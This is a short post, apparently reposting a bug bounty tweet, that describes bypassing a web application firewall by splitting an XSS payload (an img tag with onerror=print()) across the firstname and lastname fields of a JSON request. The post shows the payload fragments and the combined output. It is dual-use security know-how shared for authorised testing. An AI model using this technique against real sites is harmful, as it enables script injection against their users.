WAF bypass XSS by leo__rac

Date: October 4, 2021Author: wafbypass

Got extra bonus for XSS in JSON with WAF bypass on private @intigriti splitting my payload like this:

firstname : <img src=’
lastname: ‘onerror=print()>

Result:
“firstname”:”<img src ='”,”lastname”:”‘onerror=print()>”

JSON in src tag triggers the error: BOOM!!

#bugbountytips https://t.co/eMqmQJ9gFJ

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools